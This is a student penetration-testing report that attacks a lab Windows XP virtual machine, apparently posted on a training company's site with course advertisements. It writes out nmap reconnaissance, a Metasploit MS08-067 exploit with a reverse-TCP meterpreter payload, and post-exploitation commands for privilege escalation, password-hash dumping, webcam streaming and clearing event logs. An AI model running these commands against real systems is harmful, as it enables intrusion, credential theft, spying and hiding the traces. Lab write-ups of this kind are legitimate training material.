Vulnerability Assessment & Penetration Testing Report on Windows XP

Vulnerability Assessment & Penetration Testing Report

on

Windows XP

vulnerability assessment is the process of defining, identifying, classifying and prioritizing vulnerabilities in computer systems, applications and network infrastructures and providing the organization doing the assessment with the necessary knowledge, awareness and risk background to understand the threats to its environment and react appropriately.

 

Vulnerability  Assessment & Penetration Testing on Windows XP project done by ICSS Student Prashant Kumar. Here discussed the full process below.

 

Project NameVulnerability  Assessment & Penetration Testing on Windows XP

Author NamePrashant Kumar

Publish Date:  24-07-2018

 

Introduction:

Vulnerability Assessment and Penetration Testing (VAPT) is a Systematic analysis of security status of Information systems. Vulnerability assessment is an on-demand solution which makes it convenient to run tests over the Internet anywhere, anytime. It is a hybrid solution which blends automated testing with security expert analysis. The unique technology identifies all possible attack vectors. Vulnerability assessment offers partial evaluation of vulnerabilities, actually testing for vulnerabilities done by penetrating barriers is useful adjunct. As it identifies potential access paths missed by VAS. Penetration testing aka “pen testing” is the practice of testing a computer system, network or Web application to find vulnerabilities that an attacker could exploit.

Vulnerability Assessment & Pen tests can be automated with software applications or they can be performed manually. Either way, the process includes gathering information about the target before the test (reconnaissance), identifying possible entry points, attempting to break in (either virtually or for real) and reporting back the findings.

The main objective of penetration testing is to determine security weaknesses. A pen test can also be used to test an organization’s security policy compliance, its employees’ security awareness and the organization’s ability to identify and respond to security incidents done by Pen testers aka “Red Team”.

 

Vulnerability Assessment

 

 

Life cycle of penetration testing:

 

Life cycle of penetration testing

 

Reconnaissance

Reconnaissance denotes the work of information gathering before any real attacks are planned. The idea is to collect as much interesting information as possible about the target. Reconnaissance is probably the longest phase, sometimes lasting weeks or months. But here we have a known target, a windows xp machine connected to same network as on us.to find the target machine we will run an Nmap scan.

After Nmap scan the live hosts are-

 

Reconnaissance

 

Now we need the os details of every system connected to the network so that we can find our target machine. So first we need to separate out the live ip address so we will save the above result in a text file and then filter the ip address using the command –

 

nmap -sV -sP 192.168.31.1-255 > livehosts.txt

 

cat host.txt | grep “for” | cut -d “ “ -f5 > ip.txt

 

The output is:

 

windows xp

 

Now we have to check which one of them is a windows xp machine so we will run an script which will detect the os of all the live ip’s.

nmap -sV -O -iL ip.txt > osdetails.txt

 

And the output is:

 

Starting Nmap 7.60 ( https://nmap.org ) at 2018-07-23 02:06 IST Nmap scan report for XiaoQiang (192.168.31.1) Host is up (0.014s latency).

Not shown: 995 closed ports

 

PORT STATE SERVICE VERSION
53/tcp open domain dnsmasq 2.71
80/tcp open http nginx
8192/tcp open http Tengine httpd
8193/tcp open http nginx

 

 

8899/tcp open http    Tengine httpd

 

MAC Address: 78:11:DC:18:76:21 (Xiaomi Electronics,co.)

 

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

 

TCP/IP fingerprint:

 

OS:SCAN(V=7.60%E=4%D=7/23%OT=53%CT=1%CU=41503%PV=Y%DS=1 %DC=D%G=Y%M=7811DC%T

 

OS:M=5B54EBAA%P=i686-pc-linux-gnu)SEQ(SP=0%GCD=0%ISR=0%TI=Z%CI=Z%II=I%TS=7)

 

OS:SEQ(SP=0%GCD=0%ISR=0%TI=Z%CI=Z%TS=7)OPS(O1=M5B4ST11NW 7%O2=M5B4ST11NW7%O3

 

OS:=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11NW7%O6= M5B4ST11)WIN(W1=3890%W2=3

 

OS:890%W3=3890%W4=3890%W5=3890%W6=3890)ECN(R=Y%DF=Y%T =40%W=3908%O=M5B4NNSNW

 

OS:7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=A%A=S+%F=AS%RD=0%Q=)T2 (R=N)T3(R=N)T4(R=Y%DF

 

OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=4 0%W=0%S=Z%A=S+%F=AR%O=

 

OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0 %Q=)T7(R=N)U1(R=Y%DF=N%

 

OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G )IE(R=Y%DFI=N%T=40%CD

 

OS:=S)

 

 

Network Distance: 1 hop

 

Nmap scan report for 192.168.31.27

 

Host is up (0.016s latency).

 

Not shown: 999 closed ports

 

PORT      STATE SERVICE       VERSION

 

62078/tcp open tcpwrapped

 

MAC Address: 88:19:08:C9:D6:A8 (Unknown)

 

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

 

TCP/IP fingerprint:

 

OS:SCAN(V=7.60%E=4%D=7/23%OT=62078%CT=1%CU=31349%PV=Y% DS=1%DC=D%G=Y%M=88190

 

OS:8%TM=5B54EBAA%P=i686-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10E%TI=Z%CI=RD%TS

 

OS:=A)OPS(O1=M5B4NW6NNT11SLL%O2=M5B4NW6NNT11SLL%O3=M 5B4NW6NNT11%O4=M5B4NW6N

 

OS:NT11SLL%O5=M5B4NW6NNT11SLL%O6=M5B4NNT11SLL)WIN(W1= FFFF%W2=FFFF%W3=FFFF%W

 

OS:4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=Y%T=40%W=FFFF%O=M 5B4NW6SLL%CC=Y%Q=)T1(

 

OS:R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4( R=Y%DF=Y%T=40%W=0%S

 

OS:=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=40%W=0%S=Z%A= S+%F=AR%O=%RD=0%Q=)T6(R

 

OS:=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF= N%T=40%W=0%S=Z%A=S%F=A

 

OS:R%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=38%UN=0%RIPL=G%RI D=G%RIPCK=G%RUCK=0%RU

 

OS:D=G)IE(R=Y%DFI=S%T=40%CD=S)

 

Network Distance: 1 hop

Nmap scan report for 192.168.31.224

Host is up (0.00062s latency).

Not shown: 996 closed ports

 

PORT     STATE SERVICE           VERSION

 

135/tcp open msrpc                Microsoft Windows RPC

 

139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds

 

2869/tcp open http                Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)

 

MAC Address: 00:0C:29:BE:B1:2B (VMware)

 

Device type: general purpose

 

Running: Microsoft Windows XP|2003

 

OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003

 

OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003

 

Network Distance: 1 hop

 

Service Info: OSs: Windows, Windows XP; CPE:

 

cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

 

Nmap scan report for 192.168.31.44

 

Host is up (0.000017s latency).

 

Not shown: 999 closed ports

 

PORT  STATE SERVICE VERSION

 

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)

 

Device type: general purpose

 

Running: Linux 3.X|4.X

 

OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4

 

OS details: Linux 3.10 – 4.1

 

Network Distance: 0 hops

 

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

 

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

 

Nmap done: 6 IP addresses (4 hosts up) scanned in 261.30 seconds.

 

After analyzing the machine details the machine details in green font is our target machine. Now as we have identified our target we will move to next part.

 

 

Vulnerability scanning

 

In this part we will scan the target machine for known vulnerabilities. So again we will use Nmap to run a script which will detect vulnerability in the system.

 

nmap -Pn –script vuln 192.168.31.224 > vuln.txt

 

The output is :

 

output

 

The above picture shows the list of vulnerabilities and they are as follows:

 

|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED

 

This vulnerability exist but it doesn’t provide any user access so it can’t be used. The next one is,

 

smb-vuln-ms08-067

 

This vulnerability allows user to have remote access to the target system and it exist on windows xp 2003 machine which is our target.

 

Then the last one listed is

smb-vuln-ms17-010

 

This vulnerability also allows users to have remote access to the target system but it is not available for the windows xp 2003 machine it only exists in windows servers.

 

So now we will use the ms08_067 vulnerability to exploit the machine using Metasploit.

 

 

Attack & Penetration

 

Now as we know the vulnerability, we will search this in Metasploit framework database. Metasploit framework has a huge collection of exploits, payloads and modules which are used by the hacking community. So it can launched by typing msfconsole in the terminal.

Now we have search for the ms08_067 vulnerability. So we will type

search ms08_067

 

vulnerability

 

The description of this module is:

 

module

 

This module is used by following command.

use exploit/windows/smb/ms08_067_netapi

Now the following commands are used to see the payloads 0f this module and setting one of them as our requirement.

show payloads

We are going to use ‘windows/meterpreter/reverse_tcp’ payload.

set payload windows/meterpreter/reverse_tcp

show options

set rhost 192.168.31.224   (target ip address)

set lhost 192.168.31.44  (attacker ip address)

 

attacker ip address

 

Now to get a access session with the target machine exploit command is used.

 

exploit

 

 

 

Post exploitation

 

Once we get a meterpreter session we have the full access of the target machine. we can do anything we want like we can escalate privilege by the command-

Getsystem

 

To confirm check the ip by command-

ipconfig

 

The following picture shows that-

picture

 

We can see the options by typing help. Some common commands are:

sysinfo

getuid

hashdump

 

webcam_stream (If the target machine has a webcam)

download

cd

pwd

ls

reboot

When our task is completed. No longer need of the target machine we need to clear our footprints using command –

clearev

 

 

 

Conclusion & Recommendations

 

After reviewing the vulnerability and getting access of the system is a big security threat. Our data can be misused. So machine should be kept safe from such things.

This particular vulnerability was patched and released by the Microsoft a long ago so just perform a windows update and this vulnerability will automatically disappear.

 

Recommendations are:

  • Always keep the machine & its software updated.

 

  • Use a good antivirus.

 

  • We can use a custom firewall too.

 

  • Don’t install software from unknown source.

 

 

 

 

 

…………End of the report………..

 

 

Highest Selling Technical Courses of Indian Cyber Security Solutions:

Certified Ethical Hacker Training in Bhubaneswar

Ethical Hacking Training in Bhubaneswar

Certified Ethical Hacker Training in Bangalore

Ethical Hacking Training in Bangalore

Certified Ethical Hacker Training in Hyderabad

Ethical Hacking Training in Hyderabad

Python Training in Bangalore

Python Training in Hyderabad

Python Training in Bhubaneswar

Microsoft Azure Training in Hyderabad

Microsoft Azure Training in Bangalore

Microsoft Azure Training in Bhubaneswar

Networking Training in Bangalore

Networking Training in Hyderabad

Networking Training in Bhubaneswar

Advance Python Training in Hyderabad

Advance Python Training in Bangalore

Advance Python Training in Bhubaneswar

Amazon Web Services Training in Hyderabad

Amazon Web Services Training in Bangalore

Amazon Web Services Training in Bhubaneswar

Certified Ethical Hacker Certification – C | EH v10

Computer Forensic Training in Kolkata

Summer Training for CSE, IT, BCA & MCA Students 

Network Penetration Testing training

Ethical Hacking  training

Internet Of Things Training

Internet Of Things Training Hyderabad

Embedded System Training

Digital Marketing Training

Machine Learning Training

Python Programming training

Android Training in Bangalore

Android Training in Hyderabad

Android Training in Bhubaneswar

Diploma in Network Security Training

Android Development  training

Secured Coding in Java

Certified Network Penetration Tester 

Diploma in Web Application Security 

Certified Web Application Penetration Tester 

Certified Android Penetration Tester 

Certified Python Programming 

Advance Python Training 

Reverse Engineering Training  

Amazon Web Services Training  

VMware Training 

 

Cybersecurity services that can protect your company:

Web Security | Web Penetration Testing

Network Penetration Testing – NPT

Android App Penetration Testing

Source Web Development

Source Code Review

Android App Development

Digital Marketing Consultancy

Data Recovery

 

Other Location for Online Courses:

Bhubaneswar

Bangalore

Hyderabad

 

 

 

 

 

 

 


Show Buttons
Hide Buttons